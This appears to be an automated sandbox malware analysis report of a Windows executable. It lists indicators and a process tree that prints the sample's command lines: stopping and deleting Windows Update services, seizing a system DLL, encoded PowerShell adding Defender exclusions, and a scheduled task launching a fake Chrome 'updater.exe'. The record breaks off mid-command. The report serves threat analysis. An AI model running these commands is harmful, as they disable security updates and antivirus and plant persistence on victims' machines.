Analysis
-
max time kernel
284s -
max time network
183s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
23-08-2022 10:15
Static task
static1
Behavioral task
behavioral1
Sample
3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe
Resource
win7-20220812-en
General
-
Target
3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe
-
Size
1.8MB
-
MD5
707de025f2ab727fbb3b33f4ff8b97b3
-
SHA1
51a571a425a36cbbc3103d5e9991d080ccd4abc6
-
SHA256
3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea
-
SHA512
256104c78b6f4a7ae7698a5dfa208526583124aec0be194b267e7ab83ed29b0fd893cd3fb829d1d11ef5abcb94192bdf2993780c5a6b8caebe6fb40d1fadf91c
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 1712 updater.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 4952 icacls.exe 3592 takeown.exe 4460 icacls.exe 4436 takeown.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 4436 takeown.exe 4952 icacls.exe 3592 takeown.exe 4460 icacls.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.EXEpowershell.exeupdater.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updater.exe.log updater.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE -
Drops file in Program Files directory 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe powershell.exe File opened for modification C:\Program Files\Google\Chrome\updater.exe powershell.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2904 sc.exe 1264 sc.exe 1084 sc.exe 1088 sc.exe 2568 sc.exe 3608 sc.exe 3944 sc.exe 4248 sc.exe 3376 sc.exe 4200 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.exeupdater.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 4328 reg.exe 4596 reg.exe 3240 reg.exe 4584 reg.exe 4496 reg.exe 4880 reg.exe 4712 reg.exe 3764 reg.exe 4316 reg.exe 3592 reg.exe 3204 reg.exe 4948 reg.exe 4088 reg.exe 4808 reg.exe 4944 reg.exe 4088 reg.exe 4808 reg.exe 4224 reg.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
powershell.exe3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exepowershell.exepowershell.EXEpowershell.exeupdater.exepid process 4108 powershell.exe 4108 powershell.exe 4108 powershell.exe 5104 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 5052 powershell.EXE 5052 powershell.EXE 5052 powershell.EXE 1228 powershell.exe 1228 powershell.exe 1228 powershell.exe 1712 updater.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exe3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exetakeown.exepowershell.exedescription pid process Token: SeDebugPrivilege 4108 powershell.exe Token: SeIncreaseQuotaPrivilege 4108 powershell.exe Token: SeSecurityPrivilege 4108 powershell.exe Token: SeTakeOwnershipPrivilege 4108 powershell.exe Token: SeLoadDriverPrivilege 4108 powershell.exe Token: SeSystemProfilePrivilege 4108 powershell.exe Token: SeSystemtimePrivilege 4108 powershell.exe Token: SeProfSingleProcessPrivilege 4108 powershell.exe Token: SeIncBasePriorityPrivilege 4108 powershell.exe Token: SeCreatePagefilePrivilege 4108 powershell.exe Token: SeBackupPrivilege 4108 powershell.exe Token: SeRestorePrivilege 4108 powershell.exe Token: SeShutdownPrivilege 4108 powershell.exe Token: SeDebugPrivilege 4108 powershell.exe Token: SeSystemEnvironmentPrivilege 4108 powershell.exe Token: SeRemoteShutdownPrivilege 4108 powershell.exe Token: SeUndockPrivilege 4108 powershell.exe Token: SeManageVolumePrivilege 4108 powershell.exe Token: 33 4108 powershell.exe Token: 34 4108 powershell.exe Token: 35 4108 powershell.exe Token: 36 4108 powershell.exe Token: SeDebugPrivilege 5104 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe Token: SeTakeOwnershipPrivilege 4436 takeown.exe Token: SeDebugPrivilege 4440 powershell.exe Token: SeIncreaseQuotaPrivilege 4440 powershell.exe Token: SeSecurityPrivilege 4440 powershell.exe Token: SeTakeOwnershipPrivilege 4440 powershell.exe Token: SeLoadDriverPrivilege 4440 powershell.exe Token: SeSystemProfilePrivilege 4440 powershell.exe Token: SeSystemtimePrivilege 4440 powershell.exe Token: SeProfSingleProcessPrivilege 4440 powershell.exe Token: SeIncBasePriorityPrivilege 4440 powershell.exe Token: SeCreatePagefilePrivilege 4440 powershell.exe Token: SeBackupPrivilege 4440 powershell.exe Token: SeRestorePrivilege 4440 powershell.exe Token: SeShutdownPrivilege 4440 powershell.exe Token: SeDebugPrivilege 4440 powershell.exe Token: SeSystemEnvironmentPrivilege 4440 powershell.exe Token: SeRemoteShutdownPrivilege 4440 powershell.exe Token: SeUndockPrivilege 4440 powershell.exe Token: SeManageVolumePrivilege 4440 powershell.exe Token: 33 4440 powershell.exe Token: 34 4440 powershell.exe Token: 35 4440 powershell.exe Token: 36 4440 powershell.exe Token: SeIncreaseQuotaPrivilege 4440 powershell.exe Token: SeSecurityPrivilege 4440 powershell.exe Token: SeTakeOwnershipPrivilege 4440 powershell.exe Token: SeLoadDriverPrivilege 4440 powershell.exe Token: SeSystemProfilePrivilege 4440 powershell.exe Token: SeSystemtimePrivilege 4440 powershell.exe Token: SeProfSingleProcessPrivilege 4440 powershell.exe Token: SeIncBasePriorityPrivilege 4440 powershell.exe Token: SeCreatePagefilePrivilege 4440 powershell.exe Token: SeBackupPrivilege 4440 powershell.exe Token: SeRestorePrivilege 4440 powershell.exe Token: SeShutdownPrivilege 4440 powershell.exe Token: SeDebugPrivilege 4440 powershell.exe Token: SeSystemEnvironmentPrivilege 4440 powershell.exe Token: SeRemoteShutdownPrivilege 4440 powershell.exe Token: SeUndockPrivilege 4440 powershell.exe Token: SeManageVolumePrivilege 4440 powershell.exe Token: 33 4440 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.execmd.exepowershell.EXEupdater.execmd.exedescription pid process target process PID 5104 wrote to memory of 4108 5104 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe powershell.exe PID 5104 wrote to memory of 4108 5104 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe powershell.exe PID 5104 wrote to memory of 4304 5104 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 5104 wrote to memory of 4304 5104 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 4304 wrote to memory of 2568 4304 cmd.exe sc.exe PID 4304 wrote to memory of 2568 4304 cmd.exe sc.exe PID 4304 wrote to memory of 2904 4304 cmd.exe sc.exe PID 4304 wrote to memory of 2904 4304 cmd.exe sc.exe PID 4304 wrote to memory of 1264 4304 cmd.exe sc.exe PID 4304 wrote to memory of 1264 4304 cmd.exe sc.exe PID 4304 wrote to memory of 3608 4304 cmd.exe sc.exe PID 4304 wrote to memory of 3608 4304 cmd.exe sc.exe PID 4304 wrote to memory of 3944 4304 cmd.exe sc.exe PID 4304 wrote to memory of 3944 4304 cmd.exe sc.exe PID 4304 wrote to memory of 4088 4304 cmd.exe reg.exe PID 4304 wrote to memory of 4088 4304 cmd.exe reg.exe PID 4304 wrote to memory of 4328 4304 cmd.exe reg.exe PID 4304 wrote to memory of 4328 4304 cmd.exe reg.exe PID 4304 wrote to memory of 4808 4304 cmd.exe reg.exe PID 4304 wrote to memory of 4808 4304 cmd.exe reg.exe PID 4304 wrote to memory of 4596 4304 cmd.exe reg.exe PID 4304 wrote to memory of 4596 4304 cmd.exe reg.exe PID 4304 wrote to memory of 3592 4304 cmd.exe reg.exe PID 4304 wrote to memory of 3592 4304 cmd.exe reg.exe PID 4304 wrote to memory of 4436 4304 cmd.exe takeown.exe PID 4304 wrote to memory of 4436 4304 cmd.exe takeown.exe PID 5104 wrote to memory of 4440 5104 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe powershell.exe PID 5104 wrote to memory of 4440 5104 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe powershell.exe PID 4304 wrote to memory of 4952 4304 cmd.exe icacls.exe PID 4304 wrote to memory of 4952 4304 cmd.exe icacls.exe PID 4304 wrote to memory of 3240 4304 cmd.exe reg.exe PID 4304 wrote to memory of 3240 4304 cmd.exe reg.exe PID 4304 wrote to memory of 3204 4304 cmd.exe reg.exe PID 4304 wrote to memory of 3204 4304 cmd.exe reg.exe PID 4304 wrote to memory of 4948 4304 cmd.exe reg.exe PID 4304 wrote to memory of 4948 4304 cmd.exe reg.exe PID 4304 wrote to memory of 4584 4304 cmd.exe reg.exe PID 4304 wrote to memory of 4584 4304 cmd.exe reg.exe PID 4304 wrote to memory of 2488 4304 cmd.exe schtasks.exe PID 4304 wrote to memory of 2488 4304 cmd.exe schtasks.exe PID 4304 wrote to memory of 4612 4304 cmd.exe schtasks.exe PID 4304 wrote to memory of 4612 4304 cmd.exe schtasks.exe PID 4304 wrote to memory of 3896 4304 cmd.exe schtasks.exe PID 4304 wrote to memory of 3896 4304 cmd.exe schtasks.exe PID 4304 wrote to memory of 1840 4304 cmd.exe schtasks.exe PID 4304 wrote to memory of 1840 4304 cmd.exe schtasks.exe PID 4304 wrote to memory of 4924 4304 cmd.exe schtasks.exe PID 4304 wrote to memory of 4924 4304 cmd.exe schtasks.exe PID 4304 wrote to memory of 4876 4304 cmd.exe schtasks.exe PID 4304 wrote to memory of 4876 4304 cmd.exe schtasks.exe PID 4304 wrote to memory of 4896 4304 cmd.exe schtasks.exe PID 4304 wrote to memory of 4896 4304 cmd.exe schtasks.exe PID 5052 wrote to memory of 1712 5052 powershell.EXE updater.exe PID 5052 wrote to memory of 1712 5052 powershell.EXE updater.exe PID 1712 wrote to memory of 1228 1712 updater.exe powershell.exe PID 1712 wrote to memory of 1228 1712 updater.exe powershell.exe PID 1712 wrote to memory of 4812 1712 updater.exe cmd.exe PID 1712 wrote to memory of 4812 1712 updater.exe cmd.exe PID 4812 wrote to memory of 4248 4812 cmd.exe sc.exe PID 4812 wrote to memory of 4248 4812 cmd.exe sc.exe PID 4812 wrote to memory of 1084 4812 cmd.exe sc.exe PID 4812 wrote to memory of 1084 4812 cmd.exe sc.exe PID 4812 wrote to memory of 3376 4812 cmd.exe sc.exe PID 4812 wrote to memory of 3376 4812 cmd.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe"C:\Users\Admin\AppData\Local\Temp\3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AdABoAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAcgB4ACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4108 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2568 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2904 -
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1264 -
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3608 -
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3944 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
PID:4088 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
PID:4328 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies security service
- Modifies registry key
PID:4808 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
PID:4596 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
PID:3592 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4436 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4952 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
PID:3240 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
PID:3204 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
PID:4948 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
PID:4584 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵PID:2488
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵PID:4612
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵PID:3896
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵PID:1840
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵PID:4924
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵PID:4876
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵PID:4896
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAcgBtACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAJwAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACIAUABBAEEAagBBAEgAQQBBAFkAdwBBAGoAQQBEADQAQQBJAEEAQgBUAEEASABRAEEAWQBRAEIAeQBBAEgAUQBBAEwAUQBCAFEAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYwB3AEIAegBBAEMAQQBBAEwAUQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEARgBBAEEAWQBRAEIAMABBAEcAZwBBAEkAQQBBAG4AQQBFAE0AQQBPAGcAQgBjAEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBJAEEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEgATQBBAFgAQQBCAEgAQQBHADgAQQBiAHcAQgBuAEEARwB3AEEAWgBRAEIAYwBBAEUATQBBAGEAQQBCAHkAQQBHADgAQQBiAFEAQgBsAEEARgB3AEEAZABRAEIAdwBBAEcAUQBBAFkAUQBCADAAQQBHAFUAQQBjAGcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAHQAQQBGAFkAQQBaAFEAQgB5AEEARwBJAEEASQBBAEIAUwBBAEgAVQBBAGIAZwBCAEIAQQBIAE0AQQBJAEEAQQA4AEEAQwBNAEEAYgB3AEIAegBBAEcAVQBBAEkAdwBBACsAQQBBAD0APQAiACcAKQAgADwAIwBrAGMAbAAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAHoAYgBvACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0